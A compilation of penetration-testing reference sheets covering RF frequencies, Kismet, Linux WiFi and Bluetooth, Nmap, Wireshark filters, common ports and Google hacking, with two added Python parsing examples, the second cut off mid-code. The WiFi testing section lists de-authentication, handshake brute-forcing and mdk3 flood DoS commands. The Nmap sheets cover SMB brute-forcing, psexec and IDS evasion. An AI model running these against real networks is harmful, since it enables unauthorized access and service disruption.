                       13.56 MHz (HF)
                       433 MHz (UHF)
Keyless Entry          315 MHz (N. Am)
                       433.92 MHz (Europe, Asia)
Cellular (US)          698-894 MHz
                       1710-1755 MHz
                       1850-1910 MHz
                       2110-2155 MHz
GPS                    1227.60, 1575.42 MHz
L Band                 1-2 GHz
802.15.4 (ZigBee)      868 MHz (Europe)
                       915 MHz (US, Australia)
                       2.4 GHz (worldwide)
802.15.1 (Bluetooth)   2.4-2.4835 GHz
802.11b/g              2.4 GHz
802.11a                5.0 GHz
802.11n                2.4/5.0 GHz
C Band                 4-8 GHz
Ku Band                12-18 GHz
K Band                 18-26.5 GHz
Ka Band                26.5-40 GHz

FCC ID LOOKUP
https://apps.fcc.gov/oetcf/eas/reports/GenericSearch.cfm

FREQUENCY DATABASE
http://www.radioreference.com/apps/db/


KISMET REFERENCE [5] 


List Kismet servers 

Help 

Toggle full-screen view 

Name current network 

Toggle muting of sound 

View detailed information for network 
Tag or untag selected network 
Sort network list 

Group tagged networks 

Show wireless card power levels 
Ungroup current group 

Dump printable strings 

Show clients in current network 
Packet rate graph 

Lock channel hopping to selected channel 
View network statistics 

Return to normal channel hopping 
Dump packet type 

Expand/collapse groups 

Follow network center 

Re-draw the screen 

Track alerts 

Quit Kismet 

Close popup window 




LINUX WIFI COMMANDS
iwconfig                 Wireless interface config
rfkill list              Identify wifi problems
rfkill unblock all       Turn on wifi
airodump-ng mon0         Monitor all interfaces

CONNECT TO UNSECURED WIFI
iwconfig ath0 essid $SSID
ifconfig ath0 up
dhclient ath0

CONNECT TO WEP WIFI NETWORK
iwconfig ath0 essid $SSID key <key>
ifconfig ath0 up
dhclient ath0

CONNECT TO WPA-PSK WIFI NETWORK
iwconfig ath0 essid $SSID
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-psk.conf
dhclient ath0

CONNECT TO WPA-ENTERPRISE WIFI NETWORK
iwconfig ath0 essid $SSID
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-ent.conf
dhclient ath0

LINUX BLUETOOTH
hciconfig hci0 up                                   Turn on bluetooth interface
hcitool -i hci0 scan --flush --all                  Scan for bluetooth devices
sdptool browse <BD_ADDR>                            List open services
hciconfig hci0 name "NAME" class 0x520204 piscan    Set as discoverable
pand -K                                             Clear pand sessions


LINUX WIFI TESTING

START MONITOR MODE INTERFACE
airmon-ng stop ath0
airmon-ng start wifi0
iwconfig ath0 channel $CH

CAPTURE CLIENT HANDSHAKE
airodump-ng -c $CH --bssid $AP -w file ath0     #Capture traffic
aireplay-ng -0 10 -a $AP -c $CH ath0            #Force client de-auth

BRUTE FORCE HANDSHAKE
aircrack-ng -w wordlist capture.cap          # WPA-PSK
asleap -r capture.cap -W dict.asleap         # LEAP
eapmd5pass -r capture.cap -w wordlist        # EAP-MD5

DOS ATTACKS
mdk3 <int> a -a $AP      #Auth Flood
mdk3 <int> b -c $CH      #Beacon Flood

SCRATCH PAD

Scripting Engine


-sC                                                        Run default scripts
--script=<ScriptName>|<ScriptCategory>|<ScriptDir>...      Run individual or groups of scripts
--script-args=<Name1=Value1,...>                           Use the list of script arguments
--script-updatedb                                          Update script database


Script Categories 


Nmap's script categories include, but are not limited to, the 
following: 


auth: Utilize credentials or bypass authentication on target 
hosts. 

broadcast: Discover hosts not included on command line by 
broadcasting on local network. 

brute: Attempt to guess passwords on target systems, for a 
variety of protocols, including http, SNMP, IAX, MySQL, VNC, 
etc. 

default: Scripts run automatically when -sC or -A are used. 
discovery: Try to learn more information about target hosts 
through public sources of information, SNMP, directory services, 
and more. 

dos: May cause denial of service conditions in target hosts. 
exploit: Attempt to exploit target systems. 

external: Interact with third-party systems not included in 
target list. 

fuzzer: Send unexpected input in network protocol fields. 
intrusive: May crash target, consume excessive resources, or 
otherwise impact target machines in a malicious fashion. 
malware: Look for signs of malware infection on the target 
hosts. 

safe: Designed not to impact target in a negative fashion. 
version: Measure the version of software or protocol spoken 
by target hosts. 

vuln: Measure whether target systems have a known vulnerability.


Notable Scripts 


A full list of Nmap Scripting Engine scripts is 
available at http://nmap.org/nsedoc/ 


Some particularly useful scripts include: 


dns-zone-transfer: Attempts to pull a zone file (AXFR) from a DNS server.
$ nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=<domain> -p53 <hosts>

http-robots.txt: Harvests robots.txt files from discovered web servers.
$ nmap --script http-robots.txt <hosts>

smb-brute: Attempts to determine valid username and password combinations via automated guessing.
$ nmap --script smb-brute.nse -p445 <hosts>

smb-psexec: Attempts to run a series of programs on the target machine, using credentials provided as scriptargs.
$ nmap --script smb-psexec.nse --script-args=smbuser=<username>,smbpass=<password>[,config=<config>] -p445 <hosts>


Cheat Sheet 
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POCKET REFERENCE GUIDE 
SANS Institute 


http://www.sans.org 


INSTITUTE 


Base Syntax
# nmap [ScanType] [Options] {targets}


Target Specification

IPv4 address:       192.168.1.1
IPv6 address:       AABB:CCDD::FF%eth0
Host name:          www.target.tgt
IP address range:   192.168.0-255.0-255
CIDR block:         192.168.0.0/16
Use file with list of targets:  -iL <filename>


Target Ports

No port range specified scans the 1,000 most popular
ports

-F                      Scan 100 most popular ports
-p<port1>-<port2>       Port range
-p<port1>,<port2>,...   Port list
-pU:53,U:110,T:20-445   Mix TCP and UDP
-r                      Scan linearly (do not randomize ports)
--top-ports <n>         Scan n most popular ports
-p-65535                Leaving off the initial port in a range makes
                        Nmap start at port 1
-p0-                    Leaving off the end port in a range makes
                        Nmap scan through port 65535
-p-                     Scan ports 1-65535

Probing Options
-Pn             Don't probe (assume all hosts are up)
-PB             Default probe (TCP 80, 445 & ICMP)
-PS<portlist>   Check whether targets are up by probing TCP
                ports
-PE             Use ICMP Echo Request
-PP             Use ICMP Timestamp Request
-PM             Use ICMP Netmask Request
Scan Types

-sn           Probe only (host discovery, not port scan); -sP in older releases
-sS           SYN Scan
-sT           TCP Connect Scan
-sU           UDP Scan
-sV           Version Scan
-O            OS Detection
--scanflags   Set custom list of TCP flags using
              URG, ACK, PSH, RST, SYN, FIN in any order


Fine-Grained Timing Options

--min-hostgroup/--max-hostgroup <size>
    Parallel host scan group sizes

--min-parallelism/--max-parallelism <numprobes>
    Probe parallelization

--min-rtt-timeout/--max-rtt-timeout/--initial-rtt-timeout <time>
    Specifies probe round trip time

--max-retries <tries>
    Caps number of port scan probe retransmissions

--host-timeout <time>
    Give up on target after this long

--scan-delay/--max-scan-delay <time>
    Adjust delay between probes

--min-rate <number>
    Send packets no slower than <number> per second

--max-rate <number>
    Send packets no faster than <number> per second


Aggregate Timing Options

-T0  Paranoid:    Very slow, used for IDS evasion
-T1  Sneaky:      Quite slow, used for IDS evasion
-T2  Polite:      Slows down to consume less bandwidth,
                  runs ~10 times slower than default
-T3  Normal:      Default, a dynamic timing model
                  based on target responsiveness
-T4  Aggressive:  Assumes a fast and reliable
                  network and may overwhelm targets
-T5  Insane:      Very aggressive; will likely
                  overwhelm targets or miss open ports


Output Formats

-oN              Standard Nmap output
-oG              Greppable format
-oX              XML format
-oA <basename>   Generate Nmap, Greppable, and XML
                 output files using basename for files


Misc Options

-n         Disable reverse IP address lookups
-6         Use IPv6 only
-A         Use several features, including OS
           Detection, Version Detection, Script
           Scanning (default), and traceroute
--reason   Display reason Nmap thinks port is
           open, closed, or filtered


NMAP 5 CHEAT SHEET
SecurityByDefault.com


Target specification
IP address, hostnames, networks, etc.
Example: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL file            input from list
-iR n               choose random targets, 0 never ending
--exclude           exclude host or list
--excludefile file  exclude list from file


Host discovery
-PS n          tcp syn ping
-PA n          tcp ack ping
-PU n          udp ping
-PM            netmask req
-PP            timestamp req
-PE            echo req
-sL            list scan
-PO            protocol ping
-PN            no ping (-Pn in current releases)
-n             no DNS
-R             DNS resolution for all targets
--traceroute   trace path to host (for topology map)
-sP            ping scan only (same as -PE -PS443 -PA80 -PP)


Port scanning techniques
-sS            tcp syn scan
-sT            tcp connect scan
-sU            udp scan
-sY            sctp init scan
-sZ            sctp cookie echo
-sO            ip protocol
-sW            tcp window
-sN -sF -sX    null, fin, xmas
-sA            tcp ack


Port specification and scan order
-p n-m             range
-p-                all ports
-p n,m,z           individual
-p U:n-m,z T:n,m   U for udp, T for tcp
-F                 fast, common 100
--top-ports n      scan the highest-ratio ports
-r                 don't randomize


Service and version detection
-sV               version detection
--all-ports       don't exclude ports
--version-all     try every single probe
--version-trace   trace version scan activity


OS detection
-O               enable OS detection
--fuzzy          guess OS detection
--max-os-tries   set the maximum number of tries against a target


Timing and performance
-T0 paranoid   -T1 sneaky   -T2 polite
-T3 normal     -T4 aggressive   -T5 insane
--min-hostgroup --max-hostgroup
--min-parallelism --max-parallelism
--min-rtt-timeout --max-rtt-timeout --initial-rtt-timeout
--max-retries --host-timeout --scan-delay


Firewall/IDS evasion
-f                  fragment packets
-D d1,d2            cloak scan with decoys
-S ip               spoof source address
-g source           spoof source port
--randomize-hosts   randomize host order
--spoof-mac mac     change the src mac


Scripts
-sC                 perform scan with default scripts
--script file       run script (or all)
--script-args n=v   provide arguments
--script-trace      print incoming and outgoing communication


Output
-oN normal   -oX xml   -oG grepable   -oA all outputs


Verbosity and debugging options
-v               increase verbosity level
--reason         host and port reason
-d (1-9)         set debugging level
--packet-trace   trace packets


Runtime interaction (keys pressed while a scan runs)
v/V   increase/decrease verbosity level
d/D   increase/decrease debugging level
p/P   turn on/off packet tracing


Miscellaneous options
--resume file   resume aborted scan (from -oN or -oG output)
-6              enable ipv6 scanning
-A              aggressive, same as -O -sV -sC --traceroute


Examples
Quick scan:           nmap -T4 -F
Fast scan (port 80):  nmap -T4 --max-rtt-timeout 200 --initial-rtt-timeout 150 --min-hostgroup 512 --max-retries 0 -n -Pn -p80
Ping scan:            nmap -sP -PE -PP -PS21,23,25,80,113,31339 -PA80,113,443,10042 --source-port 53 -T4
Slow comprehensive:   nmap -sS -sU -T4 -A -v -PE -PP -PS21,22,23,25,80,113,31339 -PA80,113,443,10042 -PO --script all
Quick traceroute:     nmap -sP -PE -PS22,25,80 -PA21,23,80,3389 -PU -PO --traceroute

Note that --script all runs every NSE script, including the intrusive, dos and exploit
categories; on a live engagement select a category ("default or safe") or named scripts instead.
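Nmap's -oX output is the form to consume programmatically: the greppable -oG format is deprecated and drops NSE script output. The following is an added example, not part of either cheat sheet: a standard-library parser that flattens an -oX file into one record per open port, keeping the -sV service banner and any script output (here http-robots.txt). The XML embedded below is constructed for the example; the hosts, ports and script results in it are made up.

```python
"""Parse Nmap -oX output into a flat, greppable port list (stdlib only)."""
from __future__ import annotations
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Constructed sample of the XML that `nmap -sV --script http-robots.txt -oX out.xml` writes.
# Hosts, ports and script output are made up for this example.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX out.xml 192.0.2.0/30">
  <host><status state="up" reason="echo-reply"/>
    <address addr="192.0.2.1" addrtype="ipv4"/>
    <hostnames><hostname name="gw.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.4"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="nginx"/>
        <script id="http-robots.txt" output="1 disallowed entry&#xa;/admin/"/></port>
      <port protocol="tcp" portid="443"><state state="filtered" reason="no-response"/></port>
      <port protocol="udp" portid="53"><state state="open" reason="udp-response"/>
        <service name="domain"/></port>
    </ports>
  </host>
  <host><status state="down" reason="no-response"/>
    <address addr="192.0.2.2" addrtype="ipv4"/></host>
</nmaprun>
"""

@dataclass
class PortRecord:
    host: str
    hostname: str
    proto: str
    port: int
    state: str
    reason: str
    service: str
    scripts: dict = field(default_factory=dict)  # script id -> output text

def parse_nmap_xml(xml_text: str, states=("open",)) -> list[PortRecord]:
    """Return one PortRecord per port whose state is in `states`, for hosts that are up."""
    root = ET.fromstring(xml_text)
    records = []
    for host in root.iter("host"):
        if host.find("status").get("state") != "up":
            continue                                   # skip hosts that never answered
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            addr = host.find("address[@addrtype='ipv6']")
        hn = host.find("hostnames/hostname")
        for port in host.iter("port"):
            state = port.find("state")
            if state.get("state") not in states:
                continue
            svc = port.find("service")
            svc_name = ""
            if svc is not None:                        # join name/product/version, skipping blanks
                svc_name = " ".join(v for v in (svc.get("name"), svc.get("product"), svc.get("version")) if v)
            scripts = {s.get("id"): s.get("output", "") for s in port.findall("script")}
            records.append(PortRecord(
                host=addr.get("addr") if addr is not None else "",
                hostname=hn.get("name") if hn is not None else "",
                proto=port.get("protocol"),
                port=int(port.get("portid")),
                state=state.get("state"),
                reason=state.get("reason", ""),
                service=svc_name,
                scripts=scripts,
            ))
    return records

def as_lines(records) -> list[str]:
    """Render records as 'host proto/port state service' lines, like grepping -oG output."""
    return [f"{r.host} {r.proto}/{r.port} {r.state} {r.service}".rstrip() for r in records]

if __name__ == "__main__":
    for line in as_lines(parse_nmap_xml(SAMPLE_XML)):
        print(line)
```

Pass states=("open", "filtered") to keep filtered ports as well, which is what you want when diffing two scans of the same range for firewall changes.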


WIRESHARK DISPLAY FILTERS : PART 1                                packetlife.net


Ethernet
eth.addr        eth.len          eth.src
eth.dst         eth.lg           eth.trailer
eth.ig          eth.multicast    eth.type

IEEE 802.1Q
vlan.cfi        vlan.id          vlan.priority
vlan.etype      vlan.len         vlan.trailer

IPv4
ip.addr                     ip.fragment.overlap.conflict
ip.checksum                 ip.fragment.toolongfragment
ip.checksum_bad             ip.fragments
ip.checksum_good            ip.hdr_len
ip.dsfield                  ip.host
ip.dsfield.ce               ip.id
ip.dsfield.dscp             ip.len
ip.dsfield.ect              ip.proto
ip.dst                      ip.reassembled_in
ip.dst_host                 ip.src
ip.flags                    ip.src_host
ip.flags.df                 ip.tos
ip.flags.mf                 ip.tos.cost
ip.flags.rb                 ip.tos.delay
ip.frag_offset              ip.tos.precedence
ip.fragment                 ip.tos.reliability
ip.fragment.error           ip.tos.throughput
ip.fragment.multipletails   ip.ttl
ip.fragment.overlap         ip.version

IPv6
ipv6.addr                        ipv6.hop_opt
ipv6.class                       ipv6.host
ipv6.dst                         ipv6.mipv6_home_address
ipv6.dst_host                    ipv6.mipv6_length
ipv6.dst_opt                     ipv6.mipv6_type
ipv6.flow                        ipv6.nxt
ipv6.fragment                    ipv6.opt.pad1
ipv6.fragment.error              ipv6.opt.padn
ipv6.fragment.more               ipv6.plen
ipv6.fragment.multipletails      ipv6.reassembled_in
ipv6.fragment.offset             ipv6.routing_hdr
ipv6.fragment.overlap            ipv6.routing_hdr.addr
ipv6.fragment.overlap.conflict   ipv6.routing_hdr.left
ipv6.fragment.toolongfragment    ipv6.routing_hdr.type
ipv6.fragments                   ipv6.src
ipv6.fragment.id                 ipv6.src_host
ipv6.hlim                        ipv6.version

ARP
arp.dst.hw_mac       arp.proto.size
arp.dst.proto_ipv4   arp.proto.type
arp.hw.size          arp.src.hw_mac
arp.hw.type          arp.src.proto_ipv4
arp.opcode

TCP
tcp.ack                  tcp.options.qs
tcp.checksum             tcp.options.sack
tcp.checksum_bad         tcp.options.sack_le
tcp.checksum_good        tcp.options.sack_perm
tcp.continuation_to      tcp.options.sack_re
tcp.dstport              tcp.options.time_stamp
tcp.flags                tcp.options.wscale
tcp.flags.ack            tcp.options.wscale_val
tcp.flags.cwr            tcp.pdu.last_frame
tcp.flags.ecn            tcp.pdu.size
tcp.flags.fin            tcp.pdu.time
tcp.flags.push           tcp.port
tcp.flags.reset          tcp.reassembled_in
tcp.flags.syn            tcp.segment
tcp.flags.urg            tcp.segment.error
tcp.hdr_len              tcp.segment.multipletails
tcp.len                  tcp.segment.overlap
tcp.nxtseq               tcp.segment.overlap.conflict
tcp.options              tcp.segment.toolongfragment
tcp.options.cc           tcp.segments
tcp.options.ccecho       tcp.seq
tcp.options.ccnew        tcp.srcport
tcp.options.echo         tcp.time_delta
tcp.options.echo_reply   tcp.time_relative
tcp.options.md5          tcp.urgent_pointer
tcp.options.mss          tcp.window_size
tcp.options.mss_val

UDP
udp.checksum        udp.dstport    udp.srcport
udp.checksum_bad    udp.length
udp.checksum_good   udp.port

Operators               Logic
eq  or  ==              and  or  &&    Logical AND
ne  or  !=              or   or  ||    Logical OR
gt  or  >               xor  or  ^^    Logical XOR
lt  or  <               not  or  !     Logical NOT
ge  or  >=              [n] [...]      Substring operator
le  or  <=

These field names predate Wireshark 2.x. In current releases the
checksum_bad/checksum_good fields are replaced by <proto>.checksum.status
(0 = bad, 1 = good, 2 = unverified), and tcp.window_size is the scaled
window while tcp.window_size_value is the raw header field.

WIRESHARK DISPLAY FILTERS : PART 2                                packetlife.net


Frame Relay
fr.becn                       fr.de
fr.chdlctype                  fr.dlci
fr.control                    fr.dlcore_control
fr.control.f                  fr.ea
fr.control.ftype              fr.fecn
fr.control.n_r                fr.lower_dlci
fr.control.n_s                fr.nlpid
fr.control.p                  fr.second_dlci
fr.control.s_ftype            fr.snap.oui
fr.control.u_modifier_cmd     fr.snap.pid
fr.control.u_modifier_resp    fr.snaptype
fr.cr                         fr.third_dlci
fr.dc                         fr.upper_dlci

PPP
ppp.address    ppp.control    ppp.direction    ppp.protocol

MPLS
mpls.bottom          mpls.oam.defect_location
mpls.cw.control      mpls.oam.defect_type
mpls.cw.res          mpls.oam.frequency
mpls.exp             mpls.oam.function_type
mpls.label           mpls.oam.ttsi
mpls.oam.bip16       mpls.ttl

ICMP
icmp.checksum        icmp.ident      icmp.seq
icmp.checksum_bad    icmp.mtu        icmp.type
icmp.code            icmp.redir_gw

DTP
dtp.neighbor    dtp.tlv_len    dtp.tlv_type    dtp.version

VTP
vtp.code           vtp.vlan_info.802_10_index
vtp.conf_rev_num   vtp.vlan_info.isl_vlan_id
vtp.followers      vtp.vlan_info.len
vtp.md             vtp.vlan_info.mtu_size
vtp.md5_digest     vtp.vlan_info.status.vlan_susp
vtp.md_len         vtp.vlan_info.tlv_len
vtp.seq_num        vtp.vlan_info.tlv_type
vtp.start_value    vtp.vlan_info.vlan_name
vtp.upd_id         vtp.vlan_info.vlan_name_len
vtp.upd_ts         vtp.vlan_info.vlan_type
vtp.version

ICMPv6
icmpv6.all_comp          icmpv6.option.name_type.fqdn
icmpv6.checksum          icmpv6.option.name_x501
icmpv6.checksum_bad      icmpv6.option.rsa.key_hash
icmpv6.code              icmpv6.option.type
icmpv6.comp              icmpv6.ra.cur_hop_limit
icmpv6.haad.ha_addrs     icmpv6.ra.reachable_time
icmpv6.identifier        icmpv6.ra.retrans_timer
icmpv6.option            icmpv6.ra.router_lifetime
icmpv6.option.cga        icmpv6.recursive_dns_serv
icmpv6.option.length     icmpv6.type
icmpv6.option.name_type

RIP
rip.auth.passwd   rip.ip         rip.route_tag
rip.auth.type     rip.metric     rip.routing_domain
rip.command       rip.netmask    rip.version
rip.family        rip.next_hop

BGP
bgp.aggregator_as        bgp.mp_reach_nlri_ipv4_prefix
bgp.aggregator_origin    bgp.mp_unreach_nlri_ipv4_prefix
bgp.as_path              bgp.multi_exit_disc
bgp.cluster_identifier   bgp.next_hop
bgp.cluster_list         bgp.nlri_prefix
bgp.community_as         bgp.origin
bgp.community_value      bgp.originator_id
bgp.local_pref           bgp.type
bgp.mp_nlri_tnl_id       bgp.withdrawn_prefix

HTTP
http.accept              http.proxy_authenticate
http.accept_encoding     http.proxy_authorization
http.accept_language     http.proxy_connect_host
http.authbasic           http.proxy_connect_port
http.authorization       http.referer
http.cache_control       http.request
http.connection          http.request.method
http.content_encoding    http.request.uri
http.content_length      http.request.version
http.content_type        http.response
http.cookie              http.response.code
http.date                http.server
http.host                http.set_cookie
http.last_modified       http.transfer_encoding
http.location            http.user_agent
http.notification        http.www_authenticate
                         http.x_forwarded_for

COMMON PORTS
TCP/UDP Port Numbers

7         Echo                    554          RTSP
19        Chargen                 546-547      DHCPv6
20-21     FTP                     560          rmonitor
22        SSH/SCP                 563          NNTP over SSL
23        Telnet                  587          SMTP
25        SMTP                    591          FileMaker
42        WINS Replication        593          Microsoft DCOM
43        WHOIS                   631          Internet Printing
49        TACACS                  636          LDAP over SSL
53        DNS                     639          MSDP (PIM)
67-68     DHCP/BOOTP              646          LDP (MPLS)
69        TFTP                    691          MS Exchange
70        Gopher                  860          iSCSI
79        Finger                  873          rsync
80        HTTP                    902          VMware Server
88        Kerberos                989-990      FTP over SSL
102       MS Exchange             993          IMAP4 over SSL
110       POP3                    995          POP3 over SSL
113       Ident                   1025         Microsoft RPC
119       NNTP (Usenet)           1026-1029    Windows Messenger
123       NTP                     1080         SOCKS Proxy
135       Microsoft RPC           1080         MyDoom
137-139   NetBIOS                 1194         OpenVPN
143       IMAP4                   1214         Kazaa
161-162   SNMP                    1241         Nessus
177       XDMCP                   1311         Dell OpenManage
179       BGP                     1337         WASTE
201       AppleTalk               1433-1434    Microsoft SQL
264       BGMP                    1512         WINS
318       TSP                     1589         Cisco VQP
381-383   HP Openview             1701         L2TP
389       LDAP                    1723         MS PPTP
411-412   Direct Connect          1725         Steam
443       HTTP over SSL           1741         CiscoWorks 2000
445       Microsoft DS            1755         MS Media Server
464       Kerberos                1812-1813    RADIUS
465       SMTP over SSL           1863         MSN
497       Retrospect              1985         Cisco HSRP
500       ISAKMP                  2000         Cisco SCCP
512       rexec                   2002         Cisco ACS
513       rlogin                  2049         NFS
514       syslog                  2082-2083    cPanel
515       LPD/LPR                 2100         Oracle XDB
520       RIP                     2222         DirectAdmin
521       RIPng (IPv6)            2302         Halo
540       UUCP                    2483-2484    Oracle DB

2745        Bagle.H               6891-6901    Windows Live
2967        Symantec AV           6970         Quicktime
3050        Interbase DB          7212         GhostSurf
3074        XBOX Live             7648-7649    CU-SeeMe
3124        HTTP Proxy            8000         Internet Radio
3127        MyDoom                8080         HTTP Proxy
3128        HTTP Proxy            8086-8087    Kaspersky AV
3222        GLBP                  8118         Privoxy
3260        iSCSI Target          8200         VMware Server
3306        MySQL                 8500         Adobe ColdFusion
3389        Terminal Server       8767         TeamSpeak
3689        iTunes                8866         Bagle.B
3690        Subversion            9100         HP JetDirect
3724        World of Warcraft     9101-9103    Bacula
3784-3785   Ventrilo              9119         MXit
4333        mSQL                  9800         WebDAV
4444        Blaster               9898         Dabber
4664        Google Desktop        9988         Rbot/Spybot
4672        eMule                 9999         Urchin
4899        Radmin                10000        Webmin
5000        UPnP                  10000        BackupExec
5001        Slingbox              10113-10116  NetIQ
5001        iperf                 11371        OpenPGP
5004-5005   RTP                   12035-12036  Second Life
5050        Yahoo! Messenger      12345        NetBus
5060        SIP                   13720-13721  NetBackup
5190        AIM/ICQ               14567        Battlefield
5222-5223   XMPP/Jabber           15118        Dipnet/Oddbob
5432        PostgreSQL            19226        AdminSecure
5500        VNC Server            19638        Ensim
5554        Sasser                20000        Usermin
5631-5632   pcAnywhere            24800        Synergy
5800        VNC over HTTP         25999        Xfire
5900-5904   VNC Server            27015        Half-Life
6000-6001   X11                   27374        Sub7
6112        Battle.net            28960        Call of Duty
6129        DameWare              31337        Back Orifice
6257        WinMX                 33434+       traceroute
6346-6347   Gnutella
6500        GameSpy Arcade
6566        SANE
6588        AnalogX
6665-6669   IRC
6679/6697   IRC over SSL
6699        Napster
6881-6999   BitTorrent

Legend (icon categories in the original sheet): Chat, Encrypted, Gaming,
Malicious, Peer to Peer, Streaming

A port number identifies a service only by convention; confirm what is
actually listening with version detection (nmap -sV) rather than trusting
the number, especially on the backdoor ports listed above.

IANA port assignments published at http://www.iana.org/assignments/port-numbers
by Jeremy Stretch
GOOGLE HACKING AND DEFENSE CHEAT SHEET

Advanced Operators

site:                          Search only one website
[#]...[#] or numrange:         Search within a range of numbers
date:                          Search only a range of months
safesearch:                    Exclude adult-content
link:                          Pages that link to the given page
info:                          Info about a page
related:                       Related pages
intitle:                       Searches for strings in the title of the page
allintitle:                    Searches for all strings within the page title
inurl:                         Searches for strings in the URL
allinurl:                      Searches for all strings within the URL
filetype: or ext:              Searches for files with that file extension
cache:                         Display the Google cache of the page
phonebook: or rphonebook:      Display all, residential, or business
  or bphonebook:               phone listings
author:                        Searches for the author of a newsgroup post
insubject:                     Search only in the subject of a newsgroup post
define:                        Various definitions of the word or phrase
stock:                         Get information on a stock abbreviation

Google has since retired several of these operators (among them link:, info:
and the phonebook: family); site:, inurl:, intitle:, filetype: and the quoted
phrase and - exclusion syntax still work and are the ones that matter for
reconnaissance.


Advanced Operators 


What To Type Into Search Box (& Description of Results) 


conference site:www.sans.org (Search SANS site for conference info) 


plasma television $1000...1500 (Search for plasma televisions between $1000 and $1500) 


hockey date: 3 (Search for hockey references within past 3 months; 6 and 12-month date- 
restrict options also available) 


safesearch: sex education (Search for sex education material without returning adult sites) 
link:www.sans.org (Find pages that link to the SANS website) 

info:www.sans.org (Find information about the SANS website) 

related:www.stanford.edu (Find websites related to the Stanford website) 
intitle:conference (Find pages with "conference" in the page title) 

allintitle:conference SANS (Find pages with "conference" and "SANS" in the page title. 
Doesn't combine well with other operators) 

inurl:conference (Find pages with the string "conference" in the URL) 


allinurl:conference SANS (Find pages with “conference” and "SANS" in the URL. 
Doesn't combine well with other operators) 


filetype:ppt (Find files with the "ppt" file extension. 
".ppt" are MS PowerPoint files.) 


cache:www.sans.org (Show the cached version of the page without performing the search) 


phonebook:Rick Smith MD (Find all phone book listing for Rick Smith in Maryland. 
Cannot combine with other searches) 


author:Rick (Find all newsgroup postings with "Rick" in the author name or email address.
Must be used with a Google Group search)


insubject:Mac OS X (Find all newsgroup postings with "Mac OS X" in the subject of the 
post. Must be used with a Google Group search) 


define:sarcastic (Get the definition of the word sarcastic) 


stock:AAPL (Get the stock information for Apple Computer, Inc.)


Number Searching

1Z9999W99999999999            UPS tracking numbers
999999999999                  FedEx tracking numbers
9999 9999 9999 9999 9999 99   USPS tracking numbers
AAAAA999A9AA99999             Vehicle Identification Numbers (VIN)
305214274002                  UPC codes
202                           Telephone area codes
patent 5123123                Patent numbers
                              (Remember to put the word "patent"
                              before your patent number)
n199ua                        FAA airplane registration numbers
                              (An airplane's FAA registration number
                              is typically printed on its tail)
fcc BAZ-34009-PIR             FCC equipment IDs
                              (Remember to put the word "fcc"
                              before the equipment ID)


Calculator Operators

addition           45 + 39
subtraction        45 - 39
multiplication     45 * 39
division           45 / 39
percentage of      45% of 39
raise to a power   2^5
                   (2 to the 5th power)


Operator Examples

Operator Example             Finds Pages Containing
sailboat chesapeake bay      the words sailboat, Chesapeake and Bay
sloop OR yawl                either the word sloop or the word yawl
"To each his own"            the exact phrase to each his own
virus -computer              the word virus but NOT the word computer
Star Wars Episode +III       this movie title, including the roman numeral III
~boat loan                   loan info for both the word boat and its
                             synonyms: canoe, ferry, etc.
define:sarcastic             definitions of the word sarcastic from the Web
Mac * X                      the words Mac and X separated by exactly one word
I'm Feeling Lucky            takes you directly to the first web page
(Google link)                returned for your query


Search Parameters

Parameter       Value                          Description of Use in Google Search URLs
q               the search term                The search term
filter          0 or 1                         If filter is set to 0, show potentially
                                               duplicate results.
as_epq          a search phrase                The value submitted is treated as an exact
                                               phrase. No need to surround it with quotes.
as_ft           i = include                    The file type indicated by as_filetype is
                e = exclude                    included or excluded in the search.
as_filetype     a file extension               The file type is included or excluded in
                                               the search as indicated by as_ft.
as_occt         any = anywhere                 Find the search term in the specified
                title = page title             location.
                body = text of page
                url = in the page URL
                links = in links to the page
as_dt           i = include                    The site or domain indicated by
                e = exclude                    as_sitesearch is included or excluded in
                                               the search.
as_sitesearch   site or domain                 The site or domain is included or excluded
                                               in the search as indicated by as_dt.
as_qdr          m3 = three months              Locate pages updated within the specified
                m6 = six months                time frame.
                y = past year
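The operator syntax and the as_* URL parameters are two spellings of the same query, which matters when you keep dork lists in one form and a tool or proxy wants the other. This is an added example, not part of the SANS sheet: a small standard-library parser that turns a one-line dork into the as_* parameters (as_epq for a quoted phrase, as_eq for -excluded words, as_occt for intitle:/inurl:/intext:) and back into a search URL. The parameter names are Google's; the operator-to-parameter mapping in OPERATOR_PARAMS and OCCT_OPERATORS is this example's own simplification (allintitle:, numrange: and the rest are not handled).

```python
"""Build and parse Google advanced-search URLs from dork-style queries (stdlib only)."""
from urllib.parse import urlencode, urlsplit, parse_qs

# Operator -> as_* parameter. Simplified mapping for this example; the parameter
# names are Google's advanced-search URL parameters, the operators are from the sheet.
OPERATOR_PARAMS = {
    "site": "as_sitesearch",
    "filetype": "as_filetype",
    "ext": "as_filetype",
}
OCCT_OPERATORS = {"intitle": "title", "inurl": "url", "intext": "body"}  # -> as_occt

def dork_to_params(dork: str) -> dict:
    """Split a one-line dork such as 'site:example.com filetype:pdf -public "internal use"'
    into the as_* parameters Google's advanced-search form would submit."""
    params = {"q": []}
    tokens = []
    # Keep quoted phrases together (they become as_epq); split everything else on whitespace.
    buf, quoted = [], False
    for ch in dork:
        if ch == '"':
            quoted = not quoted
            if not quoted and buf:
                params["as_epq"] = "".join(buf)
                buf = []
            continue
        if ch.isspace() and not quoted:
            if buf:
                tokens.append("".join(buf))
                buf = []
            continue
        buf.append(ch)
    if buf:
        tokens.append("".join(buf))

    for tok in tokens:
        op, sep, val = tok.partition(":")
        if sep and op in OPERATOR_PARAMS:
            params[OPERATOR_PARAMS[op]] = val
            if op == "site":
                params["as_dt"] = "i"          # include the site (e would exclude it)
            else:
                params["as_ft"] = "i"          # include the file type
        elif sep and op in OCCT_OPERATORS:
            params["as_occt"] = OCCT_OPERATORS[op]
            params["q"].append(val)
        elif tok.startswith("-") and len(tok) > 1:
            params.setdefault("as_eq", []).append(tok[1:])   # excluded words
        else:
            params["q"].append(tok)
    params["q"] = " ".join(params["q"])
    if "as_eq" in params:
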